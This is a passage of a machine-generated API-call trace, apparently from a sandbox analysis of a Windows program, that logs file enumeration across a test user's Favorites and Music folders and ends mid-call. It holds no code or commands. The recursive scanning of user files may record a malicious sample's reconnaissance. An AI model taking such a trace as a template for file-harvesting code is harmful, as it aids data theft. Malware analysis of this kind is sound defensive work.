[0180.786] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Links\\") returned="Links\\" [0180.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.787] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0180.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.787] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.787] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.787] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.787] PathFindFileNameW (pszPath="") returned="" [0180.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.787] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.787] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.787] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.788] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0180.788] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0180.788] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.788] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0180.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.788] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0180.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.788] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0180.788] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.788] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.788] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.788] PathFindFileNameW (pszPath="") returned="" [0180.788] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.791] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.791] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee50dc0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0180.791] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee4e6b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0180.791] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee55be0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0180.791] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0180.791] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0180.791] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0180.791] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.792] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.792] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0180.792] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0180.792] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.792] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.792] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.792] PathFindFileNameW (pszPath="") returned="" [0180.792] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.794] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.794] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0180.794] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a2a610, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a2a610, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0180.794] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0180.794] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0180.795] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0180.795] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0180.795] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0180.795] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.796] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.796] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\") returned="Windows Live\\" [0180.796] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0180.796] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.796] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.796] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.796] PathFindFileNameW (pszPath="") returned="" [0180.796] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.798] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.798] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0180.798] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0180.798] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0180.798] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0180.798] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 0 [0180.798] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.799] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.799] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\") returned="26hKDH\\" [0180.800] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0180.800] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.800] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.800] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.800] PathFindFileNameW (pszPath="") returned="" [0180.800] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\*" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26350e0, ftCreationTime.dwHighDateTime=0x1d8a4c7, ftLastAccessTime.dwLowDateTime=0x9e0041c0, ftLastAccessTime.dwHighDateTime=0x1d8a585, ftLastWriteTime.dwLowDateTime=0x9e0041c0, ftLastWriteTime.dwHighDateTime=0x1d8a585, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.801] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26350e0, ftCreationTime.dwHighDateTime=0x1d8a4c7, ftLastAccessTime.dwLowDateTime=0x9e0041c0, ftLastAccessTime.dwHighDateTime=0x1d8a585, ftLastWriteTime.dwLowDateTime=0x9e0041c0, ftLastWriteTime.dwHighDateTime=0x1d8a585, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.801] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274a8bd0, ftCreationTime.dwHighDateTime=0x1d89ab3, ftLastAccessTime.dwLowDateTime=0xc09bf590, ftLastAccessTime.dwHighDateTime=0x1d89aee, ftLastWriteTime.dwLowDateTime=0xc09bf590, ftLastWriteTime.dwHighDateTime=0x1d89aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dhVO", cAlternateFileName="")) returned 1 [0180.801] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cf6e80, ftCreationTime.dwHighDateTime=0x1d89b24, ftLastAccessTime.dwLowDateTime=0x90c53170, ftLastAccessTime.dwHighDateTime=0x1d89ef8, ftLastWriteTime.dwLowDateTime=0x90c53170, ftLastWriteTime.dwHighDateTime=0x1d89ef8, nFileSizeHigh=0x0, nFileSizeLow=0x54c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l5cha-37fB.mp3", cAlternateFileName="L5CHA-~1.MP3")) returned 1 [0180.801] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cf6e80, ftCreationTime.dwHighDateTime=0x1d89b24, ftLastAccessTime.dwLowDateTime=0x90c53170, ftLastAccessTime.dwHighDateTime=0x1d89ef8, ftLastWriteTime.dwLowDateTime=0x90c53170, ftLastWriteTime.dwHighDateTime=0x1d89ef8, nFileSizeHigh=0x0, nFileSizeLow=0x54c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l5cha-37fB.mp3", cAlternateFileName="L5CHA-~1.MP3")) returned 0 [0180.801] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.801] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.801] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\") returned="5U0VVnc3NrOc8n_Z\\" [0180.801] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0180.802] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.802] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.802] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.802] PathFindFileNameW (pszPath="") returned="" [0180.802] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\*" (normalized: "c:\\users\\keecfmwgj\\music\\5u0vvnc3nroc8n_z\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49396f90, ftCreationTime.dwHighDateTime=0x1d8a10c, ftLastAccessTime.dwLowDateTime=0x2809600, ftLastAccessTime.dwHighDateTime=0x1d8a11b, ftLastWriteTime.dwLowDateTime=0x2809600, ftLastWriteTime.dwHighDateTime=0x1d8a11b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.804] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49396f90, ftCreationTime.dwHighDateTime=0x1d8a10c, ftLastAccessTime.dwLowDateTime=0x2809600, ftLastAccessTime.dwHighDateTime=0x1d8a11b, ftLastWriteTime.dwLowDateTime=0x2809600, ftLastWriteTime.dwHighDateTime=0x1d8a11b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.804] FindNextFileW (in: hFindFile=0x2a05da8, 